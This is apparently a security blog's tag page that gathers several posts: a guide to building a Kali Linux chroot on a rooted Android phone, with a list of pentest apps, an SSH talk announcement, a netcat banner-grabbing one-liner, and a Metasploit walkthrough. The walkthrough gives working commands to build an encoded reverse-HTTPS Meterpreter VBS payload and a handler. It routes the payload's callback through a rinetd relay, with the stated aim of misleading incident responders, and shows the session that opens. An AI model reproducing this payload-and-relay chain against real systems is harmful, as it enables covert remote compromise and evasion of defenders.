Tag: netcat

Steps Toward Weaponizing the Android Platform

by on May.11, 2013, under Posts

(4/16/2015) – NOTE: THIS SOLUTION HAS BEEN KIND OF SUPERSEDED BY https://www.kali.org/kali-linux-nethunter/ , if nethunter doesn’t work for you then continue on with this post:

The mobile and tablet market have been flooded by millions upon millions of Android based devices. I wonder if Ken Thompson or Dennis Ritchie would have ever imagined that their invention from nearly 44 years ago would have influenced the likes of the Linux kernel,  Google, Apple, and beyond. We are now in a sea of Unix-like devices that now can easily fit in individuals pockets, which have multiple core processing power and can easily access SCADA systems with a few keystrokes.  It has never been a better time for pocket sized penetration testing devices.

In this article I will be covering ways that one can turn their Android based device into a powerful pocket sized penetration testing tool. If you’re looking to do wireless sniffing or packet injection with your Android based device, this article will be of little help. (If interested please see this, this, this, this, and this.) To do so, one needs a specific Android device that supports OTG, with a custom ROM, and you’ll most likely need an external USB wireless adapter. (Honestly, if you’re looking for a device for cracking WEP keys without any external USB wireless adapters, then I highly still recommend the Nokia N900.)

(NOTE: If you’re strictly looking to do wireless sniffing,  there is AndroidPCAP which I have tested with my Nexus 7 and a RTL8187 based wireless USB adapter.)

Firstly, before progressing on towards the weaponizing of your Android device, please take the time to back up any vital information. Have a look at this.  Reason being, is that you’ll need to root your Android based device. Depending on your device and the method of rooting, rooting your device and unlocking the bootloader can wipe your device.

Setting up Kali Linux ARM Chroot on your rooted Android based device that has about 6GB of free space

1.) Install BusyBox
2.) Install Terminal Emulator
3.) I created a Kali Linux ARM IMG that one can easily mount and it can be downloaded here:
http://goo.gl/qmGle
https://archive.org/details/Kali.nogui.armel.zitstif.chroot.482013

kali.nogui.armel.zitstif.chroot.482013.7z

md5: d60c5a52bcea35834daecb860bd8a5c7
sha1: f62c2633d214de9edad1842c9209f443bcea385d

kali.img

MD5: be61799f8eb2d98ff8874daaf572a1d5
SHA-1: f9c6a820349530350bbb902d17ae6b4a5173937c

NOTE: This image gives you about 2GB of free space in the environment to play with so use with care.

4.) Extract the 7z file and make sure that there’s a folder in this following location: /sdcard/kali
5.) In this folder you should have shell script named ‘kali’ and the ‘kali.img’ image file.
6.) To mount the kali.img file as root do this: sh /sdcard/kali/kali

Optional:
If you want Terminal Emulator to open up and go directly to the chroot environment do as follows:
1.) Open up Terminal Emulator
2.) Go to preferences
3.) Tap on Initial Command
4.) Enter this: su -c “cd /sdcard/kali && sh kali”

Now if you tap on Terminal Emulator, you’ll go directly to your Kali chroot environment. If you want to leave the environment and back to the Android command line, simply type exit.

Optional: If you want to access files from /sdcard/ from your Kali chroot envrionment, one way is to have an Openssh server on your Android device that listens on all interfaces. Then under your chroot envrionment do: mkdir /media/sdcard/ and then connect to your ssh server on your loopback interface to store the ssh key. Then you could use a script like this in your chroot environment (or even edit your .bashrc file to run it automatically):

http://zitstif.no-ip.org/mountsdcard.py #You’ll need to edit the username and password appropriately for your situation.

I should warn you that this Kali image is not setup with the idea of using a window manager or really any GUI tools. In my humble opinion to take advantage of Kali Linux, you don’t need a GUI. Using the terminal to access tools like nmap, netcat, w3af_console, sqlmap, xsser, and metasploit will be sufficient to get one started on their penetration test.

Once you’re in the Kali Linux chroot environment, please do the following:

apt-get update && apt-get upgrade && msfupdate

In addition to setting up the Kali Linux chroot environment, here are a list of other tools and a quick description of each that I recommend you to install:

2X Client – Remote desktop client
AndFTP – ftp/sftp client
androidVNC – vnc viewer client
AndSMB – Android Samba client
AnyTAG NFC Launcher – Automate your phone by scanning NFC tags
APG – OpenGPG for Android
CardTest –  Test your NFC enabled credit cards
Checksum –  basically a GUI tool for md5sum and shasum tools
ConnectBot – powerful ssh client
DNS Lookup – perform DNS and WHOIS lookups
Dolphin Browser – a browser that easily allows you to change your UserAgent
DroidSQLi – automated MySQL injection tool
dSploit – Android Network Penetration Suite
Electronic Pickpocket –  wirelessly read NFC enabled cards
Exif Viewer – shows exif data from photos and can remove this information
Fast notepad – simple but useful notepad application
Find My Router’s Password – title explains it all (mostly for default passwords)
Fing – very similar to Look@LAN tool for Windows
Goomanager –  see link for more information
Hacker’s Keyboard –  Miss the easily accessible CTRL key? This app is for you
HashPass – translate text into hashes
Hex Editor –  a very usable hex editor for Android
inSSIDer – wireless network scanner
intercepter-NG – multi-function network tool, sniffer, cookie intercepter, arp poisoner
IP info Detective – find out all sorts of info on an IP address
IP Webcam – turn your Android device into an IP security camera
Network Signal Info – basically a graphical tool for iwconfig
NFC Reader – used for reading various NFC technologies including some keycards
NFC ReTAG – Re-use/recycle write protected NFC Tags such as hotel key-cards, access badges, etc
NFC TagInfo -another NFC reader
OpenVPN Connect – open vpn client
Orbot – tor on Android
Packet Injection – poorman’s GUI version of scapy
ProxyDroid – use your socks5 proxy with this application
Root Browser – great file manager for Android
Routerpwn – test how secure your router is
SandroProxy – kind of like Webscarab
Secret Letter – a  poorman’s stegonagraphy tool
SSHDroid – openssh server for android
Supersu – manage what programs access root functions
Teamviewer – remotely control Windows, OSX, and Linux based systems
Terminal Emulator – no explanation needed
tPacketCapture – packet sniffer that doesn’t require root
VirusTotal Uploader – test your malicious payloads
Voodoo OTA RootKeeper – maintain root access even after updates
Wifi File Transfer – access files on your phone from a web browser via an http server
WifiFinder – simple wireless scanner
WiGLE Wifi wardriving – wardriving/warwalking application

Of course this is probably not complete, but I believe this is a very good suite of tools to get one started. If you can think of any more tools or if you have any suggestions, please feel free to leave a comment below.

24 Comments :, , , , , , , , , , , , , , , , , , , , , , , , , more...

SSH Tricks And More! Presented By Kyle Young [GR-ISSA] (4-20-12)

by on Jun.03, 2012, under Videos

What was covered in this presentation: SSH basics, Offensive uses of SSH, Defensive uses of SSH, automating SSH through scripting languages, brief history of SSH, setting up a poor man’s VPN, using SSH with IPV6, attacks on SSH and more!

PowerPoint Slides available at:

http://ia601206.us.archive.org/32/items/SshTricksAndMorePresentedByKyleYoung/…

sha1sum: fb8a4132f57c12f6e49beeb18880b2d961d2e37c

Full video for download is available at:

http://ia601206.us.archive.org/1/items/KyleyoungSshTricksandMorevideo/KyleYou…

sha1sum: 3b862e15e9c6664040470034ef4c2f04ce2ad1e5

Part 2: http://youtu.be/h0mzoOsc85s

Part 3: http://youtu.be/ne-H7kGrw8w

Part 4: http://youtu.be/nLSSf8CXWqk

I want to thank the Grand Rapids ISSA chapter for allowing me to put on this presentation back in April.

Leave a Comment :, , , , , , , , , , , , , , , , , , , , , , , , , more...

metasploit + rinetd fun

by on Apr.18, 2010, under Posts

A pentester might find his/her self in a situation where they might want to obfuscate the out going connection of their payload.

Now, my first idea was to use rinetd, but also a netcat relay came to mind as well. Nevertheless, my netcat relay did not work for this case.

Before I continue on, I should be explicit on what I want to do:

Create a payload that connects reversely to a host that acts a relay to the attackers host.

What are the benefits to this? Obfuscation of course. When the incidence response team takes action and possibly gets a copy of the payload, to reverse engineer it, they will notice that it connects to a host that may seem benign.
Also, the corporate firewall might only allow out going connections on specific ports and the pentester’s server might have to listen on some odd ball port due to ISP restrictions.

For redirecting I’ll be using rinetd. My three hosts are which as follows:

Host A = 192.168.1.2 (Attacker)
Host B = 192.168.1.3 (Relay host)
Host C = 192.168.1.4 (Victim)

For my payload I’ll be using a new method implemented into metasploit, which is located here:
http://blog.metasploit.com/2010/04/persistent-meterpreter-over-reverse.html

First lets create the payload:

msfpayload windows/meterpreter/reverse_https LHOST=192.168.1.3 LPORT=8080 R | msfencode -t loop-vbs -c 10 -o rineme.vbs

Next let’s setup our attacker’s handler on host 192.168.1.2:
msf> use multi/handler
msf exploit(handler) > set LHOST 192.168.1.2
LHOST => 192.168.1.2
msf exploit(handler) > set LPORT 8081
LPORT => 8081
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(handler) > exploit

[*] HTTPS listener started on https://192.168.1.2:8081/
[*] Starting the payload handler..

Next I’ll set up the relay host to relay my connection.

rinetd -c config.conf

Where config.conf is simply:

192.168.1.3 8080 192.168.1.2 8081

This way, when the payload is executed and connects to the relay host (192.168.1.3) on port 8080, the relay host will redirect the connection to the attacker’s host at 192.168.1.2 at port 8081.

Once the payload gets executed on the victim host (192.168.1.4) we should see something like this:

[*] 192.168.1.3:36716 Request received for /A0KET…

[*] 192.168.1.3:36716 Staging connection for target 0KET received…

[*] Patching Target ID 0KET into DLL

[*] 192.168.1.4:49286 Request received for /B0KET…

[*] 192.168.1.4:49286 Stage connection for target 0KET received…

[*] Meterpreter session 1 opened (192.168.1.2:8081 -> 192.168.1.4:49286)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1..
meterpreter > ipconfig
Software Loopback Interface 1
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask    : 255.0.0.0

Intel(R) PRO/1000 MT Desktop Adapter
Hardware MAC: 08:00:27:a1:52:61
IP Address  : 192.168.1.4
Netmask     : 255.255.255.0

More to come…

1 Comment :, , , , , , , , , , more...

HEAD requests on multiple web servers, all with a one liner

by on Jan.31, 2010, under Code, Posts

If you need a quick way of getting server versions and you want to do this with a one liner here’s your solution:

for i in $(cat websites); do printf "HEAD / HTTP1/.0\n\r\n" | nc -vv ${i} 80; done

‘websites’, would be a file that contains a list of websites either by domain names or IP addresses. You could also enumerate an array of websites for cases where you have stored output into an array. i.e.

array=($(cat /var/log/apache2/access.log | awk '{print $1}' | sort | uniq));
for i in ${array[@]}; do printf "HEAD / HTTP/1.0\n\r\n" | nc -vv ${i} 80; done

Lastly, a while back, I wrote a python script that does pretty much the same thing:
Plain text:
http://zitstif.no-ip.org/webEnum.txt

tar archive:
http://zitstif.no-ip.org/webEnum.tar
MD5sum: dcb02fff9e69fb004c8e6456ed82c424

Leave a Comment :, , , more...

Looking for something?

Use the form below to search the site:

Still not finding what you're looking for? Drop a comment on a post or contact us so we can take care of it!